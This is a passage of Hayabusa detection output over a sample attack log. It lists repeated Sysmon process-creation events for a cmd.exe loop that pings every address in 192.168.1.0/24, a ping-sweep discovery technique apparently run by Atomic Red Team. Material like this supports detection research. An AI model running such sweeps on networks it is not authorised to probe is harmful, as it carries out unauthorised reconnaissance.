User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4016 | PGUID: 747F3D96-D946-5D31-0000-00107C4F3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:54.999 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.161 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2780 | PGUID: 747F3D96-D946-5D31-0000-001068523600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:55.533 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.162 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4036 | PGUID: 747F3D96-D947-5D31-0000-001068553600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:56.017 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.163 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6332 | PGUID: 747F3D96-D948-5D31-0000-001054583600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:56.507 +09:00,MSEDGEWIN10,1,info,,Process 
Created,"Cmd: ping -n 1 -w 100 192.168.1.164 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4368 | PGUID: 747F3D96-D948-5D31-0000-0010405B3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:57.003 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.165 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5480 | PGUID: 747F3D96-D948-5D31-0000-00102C5E3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:57.544 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.166 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5316 | PGUID: 747F3D96-D949-5D31-0000-0010F3663600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:58.011 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.167 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1232 | PGUID: 
747F3D96-D94A-5D31-0000-0010E8693600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:58.563 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.168 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6544 | PGUID: 747F3D96-D94A-5D31-0000-0010D76C3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:59.016 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.169 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6300 | PGUID: 747F3D96-D94B-5D31-0000-0010CD6F3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:52:59.522 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.170 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1988 | PGUID: 747F3D96-D94B-5D31-0000-0010B9723600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:00.077 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.171 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i 
in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4032 | PGUID: 747F3D96-D94C-5D31-0000-0010BA763600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:00.621 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.172 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1604 | PGUID: 747F3D96-D94C-5D31-0000-0010B9793600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:01.018 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.173 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1596 | PGUID: 747F3D96-D94D-5D31-0000-0010EB853600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:01.515 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.174 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5952 | PGUID: 747F3D96-D94D-5D31-0000-0010D9883600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:02.019 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.175 | Process: C:\Windows\System32\PING.EXE | 
User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2752 | PGUID: 747F3D96-D94E-5D31-0000-0010C58B3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:02.556 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.176 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1844 | PGUID: 747F3D96-D94E-5D31-0000-00108C943600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:03.031 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.177 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3856 | PGUID: 747F3D96-D94F-5D31-0000-001079973600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:03.557 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.178 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3796 | PGUID: 747F3D96-D94F-5D31-0000-0010659A3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:04.044 +09:00,MSEDGEWIN10,1,info,,Process 
Created,"Cmd: ping -n 1 -w 100 192.168.1.179 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1244 | PGUID: 747F3D96-D950-5D31-0000-0010659D3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:04.539 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.180 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3328 | PGUID: 747F3D96-D950-5D31-0000-001051A03600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:05.023 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.181 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 592 | PGUID: 747F3D96-D951-5D31-0000-00103EA33600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:05.517 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.182 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6288 | PGUID: 
747F3D96-D951-5D31-0000-00102BA63600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:06.023 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.183 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3736 | PGUID: 747F3D96-D952-5D31-0000-001017A93600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:06.535 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.184 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1720 | PGUID: 747F3D96-D952-5D31-0000-001003AC3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:07.047 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.185 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 752 | PGUID: 747F3D96-D953-5D31-0000-0010EFAE3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:07.533 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.186 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i 
in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3680 | PGUID: 747F3D96-D953-5D31-0000-0010B7B73600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:07.912 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.187 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1880 | PGUID: 747F3D96-D953-5D31-0000-0010A3BA3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:08.521 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.188 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6172 | PGUID: 747F3D96-D954-5D31-0000-00108FBD3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:09.043 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.189 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4464 | PGUID: 747F3D96-D955-5D31-0000-0010D6C03600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:09.515 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.190 | Process: C:\Windows\System32\PING.EXE | 
User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 684 | PGUID: 747F3D96-D955-5D31-0000-0010C2C33600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:10.036 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.191 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 504 | PGUID: 747F3D96-D956-5D31-0000-0010AEC63600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:10.556 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.192 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6608 | PGUID: 747F3D96-D956-5D31-0000-00109AC93600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:11.022 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.193 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1128 | PGUID: 747F3D96-D957-5D31-0000-001086CC3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:11.504 +09:00,MSEDGEWIN10,1,info,,Process 
Created,"Cmd: ping -n 1 -w 100 192.168.1.194 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1104 | PGUID: 747F3D96-D957-5D31-0000-001072CF3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:12.040 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.195 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5244 | PGUID: 747F3D96-D958-5D31-0000-00105ED23600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:12.537 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.196 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4460 | PGUID: 747F3D96-D958-5D31-0000-001026DB3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:13.022 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.197 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3352 | PGUID: 
747F3D96-D959-5D31-0000-001016DE3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:13.509 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.198 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1136 | PGUID: 747F3D96-D959-5D31-0000-001007E13600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:14.020 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.199 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 936 | PGUID: 747F3D96-D95A-5D31-0000-0010F7E33600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:14.513 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.200 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4480 | PGUID: 747F3D96-D95A-5D31-0000-0010EBE63600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:15.001 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.201 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i 
in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6464 | PGUID: 747F3D96-D95A-5D31-0000-0010DBE93600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:15.518 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.202 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2392 | PGUID: 747F3D96-D95B-5D31-0000-0010CCEC3600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:16.026 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.203 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2624 | PGUID: 747F3D96-D95C-5D31-0000-001039F03600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:16.521 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.204 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6804 | PGUID: 747F3D96-D95C-5D31-0000-0010F7F53600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:17.037 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.205 | Process: C:\Windows\System32\PING.EXE | 
